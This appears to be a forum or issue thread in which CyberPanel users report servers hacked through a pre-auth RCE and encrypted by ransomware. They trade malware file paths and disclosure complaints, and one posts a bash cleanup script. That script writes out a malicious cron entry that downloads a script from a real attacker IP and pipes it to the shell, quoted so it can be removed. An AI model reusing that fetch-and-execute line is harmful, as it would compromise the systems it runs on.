[INFO] Hack my cyberpanel

[mikzero]

Good morning everyone,

This morning, my server with CyberPanel installed was hacked. I couldn't retrieve the logs due to the immediate shutdown of the machine, but while browsing the internet, I found this: link. I don't know if you were aware of it. It seems they inserted SSH and then launched a script. The site was accessible from the outside as it was a test system. If you have already resolved the issue, thank you very much and feel free to close the issue.

[nursyaf3312]

i think its fixed in newest update

[faisalnandak]

i also have the same problem. recently, my vps server was hit by malware. they decrypted all my files. luckily the vps provider still provides backup

[Orgoth]

i think its fixed in newest update

Yes but a lot of users have now encrypted servers and not everyone has a backup.
Some of them have a backup of 2022. "yes, I know, no backup no pity"
But cyberpanel is to blame!
Releasing the exploit details to the public without informing the users about the exploit!

It is called:

responsible disclosure

https://dreyand.rs/code/review/2024/10/27/what-are-my-options-cyberpanel-v236-pre-auth-rce#comment-6580853855

Hi, the CyberPanel team allowed me to publish the details, although I agree it was a bit too early - they should've taken more care and so should have I. Personally I thought that this doesn't affect much hosts so I didn't see much of a problem in it :/

As of today, I never got an email about the exploit!

[nursyaf3312]

i think its fixed in newest update

Yes but a lot of users have now encrypted servers and not everyone has a backup. Some of them have a backup of 2022. "yes, I know, no backup no pity" But cyberpanel is to blame! Releasing the exploit details to the public without informing the users about the exploit!

It is called:

responsible disclosure

https://dreyand.rs/code/review/2024/10/27/what-are-my-options-cyberpanel-v236-pre-auth-rce#comment-6580853855

Hi, the CyberPanel team allowed me to publish the details, although I agree it was a bit too early - they should've taken more care and so should have I. Personally I thought that this doesn't affect much hosts so I didn't see much of a problem in it :/

As of today, I never got an email about the exploit!

I agree with you, the CyberPanel team never informed the user about the exploit until the POC was disclosed.

[mikzero]

It seems that the fix has been applied, but upon reviewing the code, I see a copy-paste. link. I find it hard to believe that no one from the team communicated this or that there was no update alert on the panel. I am disappointed by this behavior. Fortunately, we had a backup, but other agencies will surely struggle with this issue. The update and security alert system needs to be reviewed. I only see this on their site: link.

[Akrobs]

Same problem, extension of encrypted files - .L0CK3D
No found decryptors....(((

[Akrobs]

First, my server got this backdoor
https://sansec.io/research/cosmicsting-cnext-persistent-backdoor

Then, on the server i'm found this file (!!!Warning!!!)
udiskssd.zip

It's not all!!! I'm found more malware:

usr/bin/perfcc
/root/.config/cron/perfcc
/etc/cron./perfclean
/etc/cron./perfcc

[advwebin]

Same problem, extension of encrypted files - .L0CK3D No found decryptors....(((

Were you able to find a solution?

[Akrobs]

Same problem, extension of encrypted files - .L0CK3D No found decryptors....(((

Were you able to find a solution?

It's C3RB3R Conti v3-based Ransomware

No decryptors (((

[dcasters]

First, my server got this backdoor https://sansec.io/research/cosmicsting-cnext-persistent-backdoor

Then, on the server i'm found this file (!!!Warning!!!) udiskssd.zip

It's not all!!! I'm found more malware:

usr/bin/perfcc /root/.config/cron/perfcc /etc/cron./perfclean /etc/cron./perfcc

Same as me, but i have backup i just restore and update cyberpanel to latest version

[Akrobs]

Check your firewall config.

I found in Alma Linux, in config file:

drifting zone enbled

This string is enable allows traffic to drift between security zones...

This happened after an attack on the server.

[r7avi]

If you cant able to access SSH ,
just reboot the system and try

once you are in , run this batch script to remove virus

#!/bin/bash

# Define malicious process names and IP address
MALICIOUS_PROCESSES=("kdevtmpfsi" "kingsin")
MALICIOUS_FILES=("/etc/kingsin" "/tmp/kdevtmpfsi")
MALICIOUS_IP="185.122.204.197"

# 1. Kill malicious processes
for process in "${MALICIOUS_PROCESSES[@]}"; do
    pkill -f "$process" && echo "Killed process: $process" || echo "Process $process not found."
done

# 2. Remove malicious files
for file in "${MALICIOUS_FILES[@]}"; do
    if [[ -f "$file" ]]; then
        rm -f "$file" && echo "Deleted file: $file"
    else
        echo "File not found: $file"
    fi
done

# 3. Remove malicious crontab entry
CRON_PATTERN="* * * * * wget -q -O - http://$MALICIOUS_IP/unk.sh | sh > /dev/null 2>&1"
(crontab -l | grep -v "$CRON_PATTERN") | crontab -
echo "Removed malicious crontab entry."

# 4. Block the malicious IP
iptables -A INPUT -s "$MALICIOUS_IP" -j DROP && echo "Blocked IP: $MALICIOUS_IP"

echo "Malware removal completed."

[Orgoth]

An alternative option could be the rescue console, if this is supported by your provider/hoster.
Then you can mount your hard drives and check the file system and files.
Also, cleanup.

Something like this: https://docs.hetzner.com/robot/dedicated-server/troubleshooting/hetzner-rescue-system